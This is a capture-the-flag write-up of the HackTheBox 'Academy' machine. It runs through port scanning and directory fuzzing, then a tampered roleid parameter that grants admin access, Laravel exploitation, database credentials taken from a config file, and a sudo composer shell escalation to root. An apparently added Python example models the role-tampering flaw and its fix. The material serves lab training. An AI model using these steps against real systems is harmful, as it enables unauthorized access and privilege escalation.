HTB Academy
Writeup for Academy box on HackTheBox.eu
Initial enumeration
Initial port scan
sudo nmap -sC -sV -vv -oA tcp 10.129.80.186 && sudo nmap -sC -sV -vv -oA allports -p- 10.129.80.186
When we browse to the IP we get redirected to academy.htb so let's add that to our hosts file.
Once there we are presented with a login / register link.
Creating an account with test/test allows us to log in and see a panel of data.
Proxying our traffic through Burp shows that the application is contacting a /api/modules path, which looks interesting.
The API paths return 404, so we move on.
Running ffuf on the main application
ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://academy.htb/FUZZ -c -e .php,.txt,.zip
Checking the original register request, we notice that we are sending a roleid=0 parameter. Let's change the role to 1 and see what happens:
uid=test1&password=test&confirm=test&roleid=1
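The roleid tampering above is a mass-assignment flaw: the server stores whatever role the client sends. The following added example (hypothetical model code, not the box's real application) parses that exact request body, shows the vulnerable handler granting admin, and a hardened handler that only reads the fields the client may supply and assigns the role server-side.

```python
"""Model of the register endpoint: trusting a client-supplied roleid vs. assigning it server-side."""
import hashlib
import os
from dataclasses import dataclass
from urllib.parse import parse_qs

ROLE_USER, ROLE_ADMIN = 0, 1


@dataclass
class User:
    uid: str
    pw_hash: str
    roleid: int


def parse_form(body: str) -> dict:
    """Flatten an application/x-www-form-urlencoded body to {field: first value}."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def _hash_password(password: str) -> str:
    # Illustrative salted PBKDF2; a real app would use a dedicated password library.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return f"{salt.hex()}:{digest.hex()}"


def register_vulnerable(form: dict) -> User:
    """Copies every field from the request, so roleid=1 makes the new user an admin."""
    if form["password"] != form["confirm"]:
        raise ValueError("passwords do not match")
    return User(form["uid"], _hash_password(form["password"]), int(form.get("roleid", ROLE_USER)))


def register_hardened(form: dict) -> User:
    """Reads only uid/password/confirm; the role is never taken from the client."""
    if form["password"] != form["confirm"]:
        raise ValueError("passwords do not match")
    return User(form["uid"], _hash_password(form["password"]), ROLE_USER)


def can_access_admin(user: User) -> bool:
    return user.roleid == ROLE_ADMIN


# Constructed sample: the tampered request body from the writeup.
TAMPERED_BODY = "uid=test1&password=test&confirm=test&roleid=1"
```

Running register_vulnerable on TAMPERED_BODY yields an admin account, while register_hardened ignores the injected field and returns a normal user.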
After we create a new account this way and log in to the admin.php page, we get some more information:
We discover a new subdomain, so we add it to our hosts file:
dev-staging-01.academy.htb
While accessing the website on this subdomain we discover it is a Laravel framework application, but it shows an error page, which tells us it is also running in debug mode.
Trying to connect to MySQL on port 33060 fails without an error.
Initial foothold
There is a Metasploit exploit for Laravel.
Browsing to the /var/www/html/academy folder we discover this is also a Laravel app, and we get a set of MySQL credentials:
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
Using the MySQL password, we try to log in as each of the users found in /home/:
21y4d
ch4p
cry0l1t3
egre55
g0blin
mrb3n
We get a hit.
User enumeration
Our user is in the adm group and has permission to read some log files, so let's see what we can find.
We can read the auth and audit logs.
Let's run linpeas to see if it can find something interesting for us: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
And it finds something interesting:
Credentials: mrb3n / [email protected]!
After SSHing in as mrb3n and running sudo -l, we find that we are able to execute composer as root via sudo.
Privilege escalation
Looking at https://gtfobins.github.io/gtfobins/composer/#sudo, we can execute a shell command while running composer:
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x